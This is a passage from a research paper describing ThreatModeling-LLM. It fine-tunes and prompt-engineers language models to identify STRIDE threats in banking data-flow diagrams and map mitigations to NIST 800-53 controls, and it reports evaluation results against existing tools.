datasets for banking threat modeling, we have meticulously designed a specialized training dataset that features 50 different banking system applications and use cases. This involved creating various types of banking system scenarios and using the TMT to draw DFDs based on application design documents. The TMT-generated threats and human-annotated mitigation strategies serve as ground truth, ensuring the dataset reflects real-world security concerns. This dataset is essential for effectively fine-tuning the LLM to understand and identify banking-specific threats and mitigation. •  We demonstrate that combining fine-tuning with advanced prompt engineering techniques significantly improves the LLM’s performance in threat modeling tasks. Specifically, for the Llama-3.1-8B model, the synergy of prompt engineering and fine-tuning increased accuracy from 0.36 to 0.69, precision from 0.49 to 0.73, recall from 0.36 to 0.73, and text similarity from 0.944 to 0.9792. This marked improvement underscores the effectiveness of our methods in sharpening the model’s ability to accurately identify threats and mitigations, making it a potent tool for cybersecurity in the banking sector. Automated threat modeling has evolved through both traditional and AI-based approaches, aiming to enhance cybersecurity across various domains. In this section, we review notable works in threat modeling for banking systems and other domains, identifying gaps that motivate the development of ThreatModeling-LLM.
ThreatModeling for Banking Systems: Tong and Ban [12] combined STRIDE with threat tree analysis to improve threat analysis efficiency in online banking. This hybrid approach provided deeper insights into security risks but lacked automation, making it labor-intensive. Chattopadhyay and Sripada [13] reviewed major threats to mobile banking, offering a comprehensive framework for detection and mitigation, yet the proposed solution was limited to identifying broad categories without generating specific mitigations. Möckel and Abdallah [14, 15] emphasized integrating security into the software development lifecycle (SDL) for e-banking, advocating early-stage threat modeling using tools like Microsoft SDL. Despite highlighting the importance of threat modeling in design, the manual nature of their approach still required significant human input. Hassan et al. [16] focused on IoT’s impact on banking, proposing blockchain-based measures for IoT security risks, but lacked an automated threat modeling mechanism that aligns with compliance standards like NIST 800-53.
Threat Modeling for Other Domains: Several studies have explored automated threat modeling beyond banking system. Aijaz et al. [17] introduced Threat Modeling and Analysis (TMA) for healthcare-IT, focusing on system vulnerabilities and attacker behavior. Although TMA improved threat identification, it did not offer real-time, adaptive mitigation strategies. Beozzo [18] proposed a novel approach for Agile corporate environments, addressing scalability and governance but not covering domain-specific needs like banking compliance.
Abuabed et al. [19] tailored a cybersecurity analysis framework for modern automobiles, integrating STRIDE, Attack Tree Analysis, and CVSS. However, their method struggled with the complexity of identifying threats across evolving banking infrastructures. Ananthapadmanabhan and Achuthan [20] integrated threat modeling with threat intelligence in cloud systems using Splunk, but this approach lacked fine-tuning for domain-specific threat detection. Rose et al. [21] introduced ThreMA, an ontology-driven threat modeling tool, while Schaad and Reski [22] proposed OVVL for early-stage threat identification. Both studies advanced automation but were limited by static frameworks that did not adapt to specific banking architectures.
Summary and Identified Gaps: Table I summarizes key related works, their strengths, and limitations. While existing approaches contribute to various aspects of threat modeling, they often lack automation, domain-specific adaptation, or compliance with standards like NIST 800-53. These gaps highlight the need for a more flexible and adaptable approach, motivating the development of ThreatModeling-LLM.
TABLE II:Description of STRIDE Framework Threats and Desired Properties. Source: https://en.wikipedia.org/wiki/STRIDE_model
Microsoft STRIDE [24] is a framework used for threat modeling in software security. As shown in Table II, it stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege, representing the various categories of security threats that need to be addressed. When using Microsoft STRIDE for threat modeling analysis, the process begins with the identification and categorization of potential security threats to a system. Each category corresponds to a specific kind of threat. For example, ‘Spoofing’ involves an unauthorized user impersonating another to gain access to a system, while ‘Tampering’ refers to the unauthorized modification of data.By applying the STRIDE framework, security analysts systematically explore each threat category in relation to the target system. They assess the system’s architecture to identify where and how these threats could potentially be realized. This involves examining data flows, authentication mechanisms, network interfaces, and other relevant aspects of the system. Once threats are identified, they are documented, and the system’s vulnerabilities that could be exploited by these threats are pinpointed.The final phase of the Stride methodology involves proposing and prioritizing mitigations for identified threats. This may include implementing secure coding practices, enhancing authentication protocols, applying encryption, or introducing intrusion detection systems. Stride not only helps in recognizing potential threats but also plays a crucial role in the design phase by guiding developers to integrate security measures early in the development process, thus reinforcing the system’s defense against malicious attacks and reducing the risk of security breaches.TABLE III:Existing Automated Threat Modeling Explanations.
NIST Cybersecurity Framework is developed by National Institute of Standards and Technology (NIST) to provide high-level cybersecurity outcomes for different sizes of business. The framework has five functions to organize the cybersecurity activities, including Identify, Protect, Detect, Respond and Recover. Identify represents understanding cybersecurity risks of the relevant organization, then Protect develops effective security protective process to maintain the running of important services. Detect refers to the discovery of the cybersecurity events, and Respond takes actions to the incident. Lastly, Recover supports the recovery to the service and minimize the impact of the cybersecurity incidents. NIST 800-5311Source: https://csrc.nist.gov/pubs/sp/800/53/r5/upd1/final complements the framework by offering a detailed catalog of security and privacy controls. While the framework outlines the “what” of cybersecurity (the essential functions), NIST 800-53 provides the “how” by specifying technical and organizational safeguards. These controls can be mapped to the framework’s functions, making NIST 800-53 an operational tool to achieve the cybersecurity outcomes outlined in the framework. The controls are categorized into 20 families, such as AC (Access Control) and IR (Incident Response), tailored to enhance security across various organizational environments.
In this section, we formally define the research problem. As shown in Figure 1, traditional threat modeling techniques, such as those based on Microsoft’s STRIDE framework, rely heavily on manual analysis, which is time-consuming and prone to human error. Furthermore, the process of identifying appropriate mitigation strategies and ensuring compliance with standards like NIST 800-53 is complex and resource-intensive. In this work, we aim to automate the threat modeling process for banking systems by leveraging LLMs as illustrated in Figure 1. Given a textual description of a banking system design, such as an ATM system, the goal is to automatically identify potential security threats based on the STRIDE framework and generate the mitigation strategies based on NIST 800-53.Let X represent the designing document of a banking system. This input X is a sequence of words (tokens), where:where xi represents the i-th token in the text, and n is the total number of tokens in the input description. The goal is to transform this input into two outputs: •  Threats Identification: T •  Mitigation Strategy: M Let T={t1,t2,…,tk} represent the set of identified threats, where ti corresponds to the i-th threat. Each threat ti is a function of the input description X and is defined based on the STRIDE framework categories (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege):where S,T,R,I,D,E represent the STRIDE categories. The function fSTRIDE maps the input X to one or more threat categories based on the analysis of the data flow diagram (DFD).Let M={m1,m2,…,mk} represent the set of mitigation strategies, where mi corresponds to the i-th mitigation strategy associated with threat ti. Each mitigation strategy mi is a function of both the identified threat ti and the control codes defined by the NIST 800-53 standard. The mitigation strategy mi is given by:where gNIST maps the identified threat ti to the corresponding NIST 800-53 mitigation control code.The system’s objective is to generate the set of pairs {(ti,mi)}i=1k from the input description X using the fine-tuned LLM model h, where each pair (ti,mi) corresponds to an identified threat and its respective mitigation strategy based on the STRIDE framework and NIST 800-53 control codes.The overall transformation can be formalized as:where h⁢(X) is the function representing the LLM-based process that identifies the threats ti and generates the corresponding mitigations mi based on NIST 800-53 standard.
Figure 2:System Overview of ThreatModeling-LLM: (i) Data Creation: Utilizes the Microsoft Threat Modeling Tool to manually generate threat modeling samples, comprising 50 samples verified manually to construct a ground truth dataset. (ii) Prompt Engineering: Involves manually designing the initial prompt for a Large Language Model (LLM), followed by optimizing these prompts to enhance model responses. (iii) Model Fine-tuning: This phase includes the fine-tuning of the threat modeling model using the LLM to improve its accuracy and reliability in threat detection, and mitigation generation (i.e., NIST 800-53 control codes).
To investigate the state-of-the-art, we examined four notable automated threat modeling tools, encompassing both industry-standard and emergent GPT-based technologies. These tools are Cyber Sentinel (CS) [9], pytm [7], STRIDEGPT (SG) [8], and Raw LLM (RL) (using ChatGPT) [25] stand out for their unique capabilities. Cyber Sentinel is renowned for its adaptability to new threats, providing proactive security measures. pytm, specifically designed for Python applications, integrates threat modeling directly into the development process, facilitating seamless security assessments. STRIDEGPT leverages the STRIDE methodology through automation to efficiently pinpoint potential threats. Lastly, Raw LLM (ChatGPT) offers broad contextual knowledge, making it a versatile tool for general threat analysis.
We summarize the strengths and weaknesses of the tools in Table III. The limitations of the four automated threat modeling tools, Cyber Sentinel, pytm, STRIDEGPT, and Raw LLM (ChatGPT), highlight the challenges in balancing strengths with functional shortcomings within the realm of cybersecurity modeling. Cyber Sentinel, while highly adaptable to new threats, suffers from limited capabilities in offering specific mitigation strategies, which restricts its utility in proactive threat management. pytm, despite its seamless integration with Python environments, does not provide direct mappings to NIST 800-53 standards, which are critical for compliance and comprehensive security analyses. STRIDEGPT, which leverages the STRIDE methodology to automate threat identification, struggles with consistent categorization and produces unstable results, undermining its reliability. Lastly, Raw LLM (ChatGPT) offers expansive contextual knowledge but falls short in providing consistent, technically precise mitigation suggestions and lacks the capability to deeply map technical controls, which are essential for detailed threat remediation and control implementation. These limitations underscore a prevalent trade-off between specializes capabilities and comprehensive functionality across these tools, signaling the need for further refinement and development to enhance their applicability and effectiveness in diverse security scenarios.
The comprehensive system overview is depicted in Figure 2. Our system consists of three core components that streamline threat modeling. The first component, Data Creation, utilizes the Microsoft Threat Modeling Tool (TMT) to manually generate samples for threat modeling, with 50 samples manually verified to establish a ground truth dataset. The second component, Prompt Engineering, involves the manual design of initial prompt for an LLM, which are then optimized to improve the model’s response effectiveness. The final component, Model Fine-tuning, focuses on refining the threat modeling model through precise LLM fine-tuning, ensuring high accuracy and reliability in the bank applications.To study automatic threat modeling using LLM in banking systems, one needs to prepare a well-organized dataset. However, as far as we know, there is no publicly available dataset. Therefore, we need to prepare the dataset, the dataset should meet the following requirements: 1) it should reflect real-world scenarios; 2) it should be generated using a publicly available and widely used tool in the security community; 3) it should include threats, mitigation, and the related control code.
In light of these requirements, this work first uses the TMT to generate different DFDs for banking systems. TMT is a core part of the Security Development Lifecycle, enabling users to create data flow diagrams and identify potential threats early. Designed for non-security experts, it simplifies threat modeling by providing standard visual notations and guidance, helping to mitigate security risks in software development. We use the Windows System. The windows operating system is Microsoft Windows Server 2019 Standard with 8GB RAM. Then, we use TMT to identify the related threats. After that, we employ LLM (i.e. GPT) to automatically identify the mitigations, and also manually check all the mitigation with local banking experts in DFD analysis. It is worth noting that, in the processes of mitigation generation and the map of mitigation to the NIST 800-53 control code generation, we have been working closely with our collaborator from the local bank, and the security expert, along with our security expert, has manually checked all the mitigations to ensure there is no noise. After this, we also employ LLM to map all the mitigations to the NIST 800-53 control codes, as our collaborator requires these codes to address all possible threats. We also want to point out that human experts have been involved in this process to ensure the quality of the mapping and that no noise is introduced. Figure 3 shows the processes for the dataset generation process.
Figure 3:Dataset Creation Framework.
Specifically, for the first step, we work closely with our local bank collaborator in preparing the DFD. For example, for the ATM DFD, we first identify all the External entities including customer client; processes such as Manage Bank Customer Information, Bank Customer Information Management, Account Information Update and so on; data stores such as Bank Customer Database and transaction record; data flows including Transaction Request, Confirmation, Cash Out & Receipts and so on; the relationship between the element such as Customers interact with the Manage Bank Customer Information process, which accesses the Bank Customer Database, Customers initiate a Transaction Request, which is handled by the Bank Customer Information Management process. Based on this information, we use TMT to draw the DFD in both the default setting and the managed setting as well. For the managed setting, the parameters are: the condition ‘Running as’ will be changed from ‘no’ to ‘network service’, the ‘Isolation level’ will be changed from ‘no’ to ‘AppContainer’, the ‘Accepts Input From’ will be changed from ‘no’ to ‘Kernel, System, or Local Admin’ and so on, we will make all the setting publicly available along with our dataset. For more information please refer to anonymous. Figure 4 provides an example of a DFD which is a Bank Account DFD. One can see, it includes: 1) External Entities such as bank customer, third financial party, other bank etc.; 2) Data Store such as customer account DB; 3) Processes such as open account for customer, customer banking account login etc.Once the DFD is ready, we will use TMT to produce the possible threats and save then into files. Afterward, we need to prepare mitigations based on the identified threats. To achieve this, we employ LLMs (e.g., GPT) to automatically identify the mitigations. To ensure the generated mitigations are practical and applicable to real-world scenarios, we manually verify them with local banking experts in DFD analysis. For example, when facing a data tampering threats, there can be different mitigations such as SC-7 or SC-8. Actually, both SC-7 and SC-8 are critical for protecting the communications and system interfaces from potential threats such as unauthorized access, and data tampering, they are controls related to system and communications protection. In this case, we will manually check whether the system need a Boundary Protection (SC-7) or Transmission Confidentiality and Integrity (SC-8). The final version of the mitigations, after manual review, will be used for the next step.For the third step, we use GPT-3.5 to map the mitigation to the NIST 800-53 control code. As a result, the prediction will include the threats, mitigations, and corresponding control codes. For example, if the identified threat category is Spoofing, the threat might be: ‘An attacker could impersonate a bank customer or IoT device to gain unauthorized access to the system. Spoofing can occur at the Web Service or IoT Device level.’ The mitigations could be: ‘Implement strong authentication mechanisms, such as multi-factor authentication (MFA) for bank customers and secure authentication for IoT devices (e.g., certificates)’ and ‘Use secure communication channels (e.g., TLS/SSL) to prevent identity spoofing.’ The related NIST 800-53 control codes would be ‘IA-2: Identification and Authentication (Organizational Users)’ and ‘SC-12: Cryptographic Key Establishment and Management.All in all, by following these steps, we created 50 DFD samples. For each sample, we will prepare a file that includes the description of the DFD, the threats, the mitigation, and the mapping of NIST 800-53 control codes. These samples will be used for fine-tuning the LLM (based on 40 samples) and evaluating the LLM models (based on 10 samples).Prompt engineering represents a critical aspect of leveraging language models effectively, acting as the interface between human intentions and machine understanding. Prompt engineering involves crafting inputs that guide AI models, particularly LLMs, to generate desired outputs with higher precision and relevance. This discipline has become increasingly significant with the rise of more sophisticated AI models that are capable of understanding and generating human-like text.
Traditional prompt engineering has evolved from simple iterative refinements to adopting more systematic approaches. One prominent method within this evolution is the CoT prompting [10]. This technique involves instructing the model to verbalize its intermediate reasoning steps or cognitive processes as it approaches a solution. By simulating a more transparent thought process, CoT helps align the model’s responses more accurately with complex problem-solving tasks, significantly improving the output’s clarity and correctness.
Recent prompt engineering has focuses more on dynamic generation of new prompts. Another innovative technique is OPRO (Optimization by PROmpting) [11], which focuses on the dynamic refinement of prompts in response to evolving dialogue contexts and the model’s prior outputs. This adaptability is especially valuable in interactive settings where user queries can progressively modify the scope or specificity of the discussion, necessitating correspondingly nuanced adjustments from the AI. OPRO enables the model to respond effectively to such shifts, maintaining relevance and depth in its answers.
Figure 4:A light example of the Generated DFD.In this context, we introduce a novel prompt engineering approach tailored for cybersecurity threat modeling. Our method identifies potential threats, suggests mitigations, and references applicable security controls, such as those specified in NIST 800-53. Integrating the strengths of CoT and OPRO, our technique establishes a robust framework for threat modeling. By using CoT, we instruct LLMs to methodically outline their reasoning, simulating an expert’s analytical process in identifying and evaluating security threats. This clear reasoning is essential for validating AI-generated insights and ensures that each step is both logical and justifiable. The explicit articulation of thought processes not only deepens the model’s analytical capabilities but also enhances the reliability and traceability of its outputs, thereby enhancing domain knowledge application.Alongside CoT, we employ OPRO to dynamically adjust these prompts according to the ongoing context of the threat modeling session. This integration allows our method to adaptively respond to new information or changes in focus, ensuring that the model’s analysis remains comprehensive and pertinent throughout the interaction. By merging these strategies, our approach guides LLMs to generate detailed, actionable threat models that not only identify potential risks but also recommend suitable mitigations aligned with NIST 800-53 control codes. This sophisticated prompting strategy significantly boosts the AI’s capacity to emulate expert-level cybersecurity analysis and aligns its outputs with industry standards, providing a formidable tool for organizations aiming to enhance their security measures.
Fine-tuning is a crucial step in adapting pre-trained language models to specific tasks, enhancing their accuracy and effectiveness in specialized domains. In the context of cybersecurity, particularly for threat identification from Data Flow Diagrams (DFDs), fine-tuning enables the model to better understand domain-specific language patterns and structures associated with potential vulnerabilities. We employ Low-Rank Adaptation (LoRA) [23] as the primary technique for fine-tuning, which is both efficient and effective for resource-constrained environments.LoRA is a parameter-efficient fine-tuning method that adapts large pre-trained models by injecting learnable low-rank matrices into the original model’s weights. This approach significantly reduces the number of trainable parameters, making fine-tuning more computationally feasible while maintaining model performance.Let 𝐖∈ℝd×k be the weight matrix of the pre-trained model, where d is the input dimension and k is the output dimension. In LoRA, the update to 𝐖 is represented as the product of two low-rank matrices:where 𝐀∈ℝd×r and 𝐁∈ℝr×k, with r≪min⁡(d,k) being the rank of the decomposition. This decomposition allows the original weight matrix to be updated as:where α is a scaling factor to control the magnitude of the adaptation, and Δ⁢𝐖 is the low-rank update applied to the original weight matrix 𝐖.Principles of LoRA Fine-tuning The core principles of the LoRA fine-tuning method include: •  Parameter Efficiency: By training only the low-rank matrices 𝐀 and 𝐁, LoRA significantly reduces the number of trainable parameters. The total number of trainable parameters becomes d×r+r×k, where r≪min⁡(d,k), making it highly efficient compared to traditional fine-tuning methods. •  Computational Efficiency: Since only the low-rank matrices 𝐀 and 𝐁 are optimized during training, the computational and memory requirements are substantially lower than those of standard fine-tuning methods. This makes LoRA suitable for environments with limited computational resources, such as edge devices or lower-end GPUs. •  Maintaining Performance: Despite its reduced parameter count, LoRA maintains or even enhances the model’s performance. The low-rank updates effectively capture domain-specific features without compromising the model’s generalization capability. •  Adaptability to Domain-specific Tasks: LoRA allows for efficient adaptation of pre-trained models to specialized tasks by focusing on learning task-specific information encoded within the low-rank matrices. In the context of threat modeling from DFDs, LoRA helps the model recognize patterns and relationships specific to cybersecurity. The LoRA-based fine-tuning approach thus provides a robust framework for adapting pre-trained models to domain-specific tasks in a resource-efficient manner, making it well-suited for applications like automated threat modeling.For this study, we manually created 50 sample related to the banking system domain, each representing a different application. Each sample simulates a unique banking system architecture, covering various aspects of threat modeling to ensure diversity and robustness in the training data. For each sample, it contains two fields: •  Application Description: Each sample contains a textual description of the application system, outlining its components, data flow, and overall architecture. •  Ground Truth Threats and Mitigations: Each application description includes manually verified threats and mitigations, which serve as ground truth labels for training and evaluation. The fine-tuning process leverages LoRA to enhance the model’s performance in the banking threat modeling domain. Key parameters for LoRA include: •  Rank (r): 32, specifying the rank of the low-rank decomposition, balancing between parameter efficiency and model adaptation. •  Scaling Factor (lora_alpha): 64, controlling the adaptation strength of the model. •  Target Modules: Includes projections such as “q_proj”, “k_proj”, “v_proj”, and “o_proj”, which are specific to Llama models. •  Dropout Rate: 0.1, applied to prevent overfitting during the adaptation process. The model training was conducted using the Transformers library with the following major hyperparameters: •  Batch Size: 4 per device, with gradient accumulation steps set to 4, effectively increasing the batch size during training. •  Optimizer: “paged_adamw_32bit”, chosen for memory efficiency and faster convergence. •  Learning Rate: 1e-4, set for stable learning and effective adaptation. •  Number of Epochs: 30, allowing sufficient training for the model to adapt to the threat modeling domain. •  Evaluation Strategy: Evaluations are performed at regular intervals (every 20% of training steps), ensuring consistent monitoring of the model’s performance.
Figure 5:The process of prompt design, combing CoT and Prompt Evolution based on OPRP.For prompt engineering, we use the following initial prompt as a start point for instructing the LLMs.
The prompt engineering process includes two steps: CoT (Chain of Thoughts) and prompt evolution as shown in Figure 5. For CoT, we incorporate “few-shot” learning by utilizing two examples to guide prompt design and optimization, and “zero shot” by employing a step-by-step reasoning method to address specific threats within the banking system.The prompt evolution is implemented based on OPRO, with the following configurations:Scorer: •  Model type: “gpt-3.5-turbo” •  Max output tokens: 1024. A higher token limit allows for comprehensive responses that can fully evaluate the effectiveness and completeness of the prompts. •  temperature: 0.0. The model will produce the most likely output, which is beneficial for consistent scoring and easier comparative analysis. •  Num Decodes: 1. Since the focus is on reliability and predictability for scoring, only one decode is needed to evaluate each input without introducing variability. •  Batch size: 1. Maintain simplicity and control over the experiment. Each prompt is processed individually, reducing complexity in handling outputs. •  Num Servers: 1. Simplify the infrastructure requirements and ensures that the environmental factors affecting model performance are consistent across all tests. Optimizer: •  Model type: “gpt-3.5-turbo” •  Max output tokens: 512. A lower token count encourages the model to focus on conciseness and creativity within a shorter output, which might lead to more diverse and inventive prompt generation. •  temperature: 1.0. Increase randomness and variability in responses. This setting is optimal for generating creative and diverse prompts. •  Batch size: 1. Like the scorer, maintaining a batch size of 1 ensures that each generated prompt is evaluated individually, allowing for precise adjustments and optimizations based on singular output analysis. •  num_servers: 1. Consistency in computational environment between scoring and optimizing, reducing any potential bias or variability introduced by different server setups. Other settings: •  Instruction position: “Q_begin” (the instruction is added before the original question.) To evaluate the performance of the proposed prompt engineering and the fine-tuned methods to identify the threats and proper mitigation control codes, we adopted semantic similarity analysis using BERT and set-based evaluation of mitigation control codes using precision, recall, and accuracy.BERT Similarity Score: We used the BERT model to compute the cosine similarity between the embeddings of the LLM-generated threats/mitigation strategies and the ground truth annotations. This allows us to capture not only exact matches but also paraphrased or contextually similar descriptions.The similarity score for each generated output is calculated as:where Gtruth is the ground truth description, and Ggenerated is the LLM-generated output.Higher similarity scores indicate better alignment with the ground truth.To evaluate the accuracy of the mitigation control codes generated by the LLM, we treated this as a set-matching problem, comparing the sets of control codes from the generated output to the ground truth. We employed the following metrics to assess performance:Precision: Precision measures the proportion of correctly generated control codes out of all codes predicted by the LLM. It is calculated as:where Cgenerated represents the set of control codes generated by the LLM, and Ctruth represents the set of ground truth control codes.Recall: Recall measures the proportion of the correct control codes identified out of all the ground truth codes. It is calculated as:Accuracy: Accuracy evaluates the overall correctness of the generated control codes, comparing the total number of correctly generated codes to the total number of codes present in both the generated set and the ground truth set. It is calculated as:The Cgenerated and Ctruth denote the mitigation codes generated by LLM and the ground truth mitigation codes.In this study, we aim to address the following research questions:RQ1: How does the performance of CoT+OPRO compare to the Initial Prompt, CoT, and OPRO?RQ2: How does fine-tuning improve the performance of LLMs compared to their base models?RQ3: How does the performance of our developed system, ThreatModeling-LLM, compare to existing methodologies? What are the effects of integrating prompt engineering with fine-tuning within our ThreatModeling-LLM framework?In the following sections, we answer the research questions and present our empirical findings.
Figure 5 highlights two crucial components in our meta prompt design process: CoT and Prompt Evolution based on OPRO. These elements play a central role in refining prompt design to enhance threat identification and mitigation precision within a banking data flow diagram scenario. Starting with CoT, it employs a step-by-step reasoning method to address specific threats within the banking system, such as data tampering and unauthorized modifications. This zero-shot approach enables targeted solutions directly linked to identified risks, ensuring that each threat is systematically addressed with appropriate security controls. In addition, CoT incorporates “few-shot” learning by utilizing specific examples to guide prompt design and optimization. This technique leverages two example QA pairs, representing distinct scenarios or questions related to potential security vulnerabilities, to refine the analysis and understanding of security threats in banking data flow diagrams.The Prompt Evolution segment captures how iterative refinements based on OPRO significantly enhance output precision. Initial analysis precision is at 0.5, reflecting the early stage of addressing security vulnerabilities. Continuous iterations refine threat models, improve description clarity, and optimize mitigation strategies, progressively increasing precision. This process culminates in a final precision of 0.57, demonstrating a systematic approach to maximizing the effectiveness of prompt design for identifying and mitigating potential security threats in the banking context.
Figure 6 presents a comparative analysis of four prompt engineering techniques: Initial Prompt, CoT, OPRO, and the combined CoT+OPRO approach. Evaluated across four metrics (Accuracy, Precision, Recall, and Text Similarity), the results, based on GPT-3.5-turbo, reveal that integrating CoT with OPRO achieves the highest performance across all metrics, particularly excelling in Precision and Text Similarity.The Initial Prompt method, serving as a baseline, shows limited effectiveness, with relatively lower scores in Accuracy (0.17), Precision (0.35), and Recall (0.27). CoT improves upon this baseline by significantly increasing both Accuracy and Recall, demonstrating that explicit reasoning steps contribute to better threat identification. CoT’s Precision also surpasses the baseline, highlighting its capability to generate more relevant and precise outputs. OPRO, when applied independently, achieves moderate improvements, especially in Precision, but does not match CoT’s overall performance.
Figure 6:Comparative performance analysis of four prompt engineering techniques (Initial Prompt, CoT, OPRO, and the combined CoT+OPRO), across Accuracy, Precision, Recall, and Text Similarity metrics based on GPT-3.5-turbo.The combination of CoT and OPRO demonstrates a synergistic effect, achieving the highest scores in all metrics, with Precision and Recall almost achieving 0.6, and Text Similarity exceeding 0.95. This combined approach enables the model to reason through intermediate steps (CoT) while dynamically refining prompts (OPRO), producing more accurate and contextually relevant outputs. These results indicate that CoT+OPRO not only enhances overall performance but also addresses the limitations of each individual method, making it a robust strategy for improving prompt engineering in automated threat modeling tasks. The output of prompt engineering process will lead to a new prompt as shown below:
We began the prompt engineering process with an initial prompt shown in section 5.4 that was detailed and descriptive, aiming to guide the model through a comprehensive analysis of threats based on a given Data Flow Diagram (DFD). This prompt provided explicit instructions for identifying security threats, specifying their types, and recommending mitigation strategies along with corresponding NIST SP 800-53 controls. Through iterative refinement, the prompt was optimized to a more compact version that retains essential information while enhancing clarity and efficiency. The optimized prompt focuses on generating a comprehensive analysis of threats, mitigation strategies, and relevant NIST SP 800-53 controls for identified risks. This evolution in prompt design reflects a balance between thorough guidance and streamlined communication, improving the model’s response precision.
(a)Llama-3.1-8B
(b)GPT-3.5-turboFigure 7:Comparison of Precision, Recall, Accuracy, and Text Similarity scores for Llama-3.1-8B and GPT-3.5-turbo: base models versus fine-tuned models. The results indicate significant performance improvements across all metrics with fine-tuning.
Figure 7 presents a comparative analysis of the performance between base and fine-tuned models for Llama-3.1-8B (7(a)) and GPT-3.5-turbo (7(b)). The evaluation covers four key metrics: Accuracy, Precision, Recall, and Text Similarity. The results demonstrate that fine-tuning significantly enhances model performance across all metrics, with the most substantial improvements observed in Precision and Recall.The base models exhibit moderate performance, with Accuracy and Recall generally lower than 0.3. Fine-tuning, however, substantially boosts these metrics. For instance, the fine-tuned version of Llama-3.1-8B achieves an Accuracy score above 0.6 and a Recall score nearing 0.5, indicating better identification of relevant threats and generation of mitigation strategies. Similarly, GPT-3.5-turbo, while having moderate base performance, shows significant improvements after fine-tuning, particularly in Precision, which increases from approximately 0.4 to 0.6. This demonstrates the model’s enhanced ability to generate more relevant outputs and reduce false positives.Moreover, the results consistently reveal improvements in Text Similarity, with fine-tuned models generating outputs that align more closely with ground truth annotations. Fine-tuned Llama-3.1-8B achieves nearly perfect Text Similarity, highlighting the effectiveness of fine-tuning in adapting language models for domain-specific tasks like automated threat modeling.It is important to note that, due to limited GPU resources, larger open-source models, such as Llama-3.1-70B, were not fine-tuned in this study. The computational demands of fine-tuning these larger models exceeded available resources. As a result, the analysis was focused on the smaller, more feasible models, demonstrating that even with resource constraints, fine-tuning smaller models like Llama-3.1-8B and GPT-3.5-turbo can yield significant performance gains.
Figure 8:Performance comparison of GPT-based threat modelling tools and our method (ThreatModeling-LLM). This figure presents comparative results across our method and three baseline tools: STRIDEGPT (SG), ChatGPT as a raw LLM (RL), and Cyber Sentinel (CS). The metrics evaluated include text similarity (based on Bert) and effectiveness in mapping to NIST control codes, measured in terms of accuracy, precision, and recall.
We firstly compared the performance of ThreatModeling-LLM (applied on the pre-trained Llama3.1-8B) to the three baselines models which used emergent GPT-based technologies, as detailed in Section 3.3. These tools are Cyber Sentinel (CS) [9], STRIDEGPT (SG) [8], and Raw LLM (RL) (using ChatGPT) [25] stand out for their unique capabilities. Figure 8 illustrates the comparative analysis between ThreatModeling-LLM and the traditional baselines. We excluded pytm for comparison as it cannot generate NIST 800-53 control codes, hence there are no results according to our performance metrics. SG, in particular, showed no results on the first metric of mapping NIST 800-53 control codes due to its inability to generate these codes. The results reveal significant limitations across all tools, SG, RL, and CS, in their capability to accurately map NIST 800-53 control codes and produce textually aligned threats and mitigations. For instance, all tools showed a notable gap in precision, scoring below 0.6, and struggled with a recall below 0.30. The text similarity results further highlight a gap in all tools’ ability to produce text outputs that closely match the semantic and syntactic requirements of the control codes and ground truth. In stark contrast, ThreatModeling-LLM outperformed these metrics significantly, achieving precision and recall rates exceeding 0.70, illustrating its superior capability in aligning with NIST 800-53 compliance standards and delivering more accurate and reliable threat modeling outcomes.
(a)Llama-3.1-8B
(b)GPT-3.5-turboFigure 9:Impact of combining prompt engineering with fine-tuning on the performance of LLMs (Llama-3.1-8B and GPT-3.5-turbo) in threat modeling tasks. Llama-3.1-8B shows a dramatic improvement across all metrics, particularly in Accuracy, Precision, and Recall, when prompt engineering is combined with fine-tuning.
We further investigate the effects of integrating prompt engineering with fine-tuning within our ThreatModeling-LLM framework. Figure 9 compares the performance of Llama-3.1-8B (9(a)) and GPT-3.5-turbo (9(b)) across four metrics—Accuracy, Precision, Recall, and Text Similarity—under different conditions: fine-tuned models, models with prompt engineering, and models applied with ThreatModeling-LLM. The results clearly show that the combination of prompt engineering and fine-tuning achieves the highest performance across all metrics, with Llama-3.1-8B exhibiting the most substantial improvement.For Llama-3.1-8B, fine-tuning alone achieves an accuracy of 0.36, precision of 0.49, recall of 0.36, and text similarity of 0.944. Prompt engineering alone results in modest improvements, pushing accuracy to 0.4001, precision to 0.4773, and recall to 0.6162. However, when applied with the ThreatModeling-LLM, Llama-3.1-8B shows a dramatic boost, achieving an accuracy of 0.69, precision of 0.73, recall of 0.73, and text similarity of 0.9792. This substantial increase across all metrics highlights how prompt engineering complements the model’s fine-tuned understanding, enabling more precise and comprehensive identification of threats and mitigations.For GPT-3.5-turbo, fine-tuning alone yields an accuracy of 0.23, precision of 0.63, recall of 0.23, and text similarity of 0.908. Prompt engineering without fine-tuning produces higher scores, reaching 0.4019 in accuracy, 0.5421 in precision, 0.5251 in recall, and 0.9449 in text similarity. The combination of prompt engineering and fine-tuning achieves further gains, with an accuracy of 0.50, precision of 0.72, recall of 0.50, and text similarity of 0.9710. While the improvements are notable, they are more moderate compared to Llama-3.1-8B, suggesting that the combined approach has a stronger impact on Llama-3.1-8B’s performance.Overall, these results confirm that integrating prompt engineering with fine-tuning maximizes model performance, particularly for Llama-3.1-8B. The combined strategy not only enhances accuracy and recall but also significantly improves precision and text similarity, leading to outputs that are more relevant and contextually aligned with ground truth annotations. This demonstrates the effectiveness of using both methods together to improve automated threat modeling.ThreatModeling-LLM effectively automates threat modeling across various pre-trained LLMs, demonstrating adaptability and improved compliance with NIST 800-53 controls. Fine-tuning models like GPT-3.5 and Llama-3.1 enhances their accuracy in threat identification and mitigation, while techniques like CoT prompting and OPRO optimization further boost performance. Although the current focus is on banking systems, future research could extend this approach to sectors like healthcare and IoT. Addressing challenges such as generalization across domains and optimizing resource efficiency for larger models remains crucial for broader application.This study mainly focuses on LLM-based automatic threat modeling using 50 samples. However, it is worth noting that our dataset is unique, as it was carefully collected in collaboration with a local bank. The data is not only rare but has been thoroughly verified and is crucial for research in this area. Expert verification and GPT augmentation have been used to enhance the dataset’s representativeness. Our threat modeling for banking systems is different from other sectors, like the stock market. The stock market deals with time-series data that changes constantly, while our data reflects real scenarios banks face. Since banks use a limited number of software applications, our dataset already covers most of the key situations they encounter. In the future, we plan to expand this approach to other sectors, such as the stock market, where we can apply it to large-scale data and solve real-world problems.Banking Sector Focus: The study primarily addresses banking-related threats, limiting its current applicability. Future work will test generalizability to other sectors without compromising domain-specific precision.Implications: 1) Cross-Domain Potential: While initially designed for banking, ThreatModeling-LLM is adaptable to various sectors through dataset customization and model retraining, making it a versatile cybersecurity tool. 2) Reduced Human 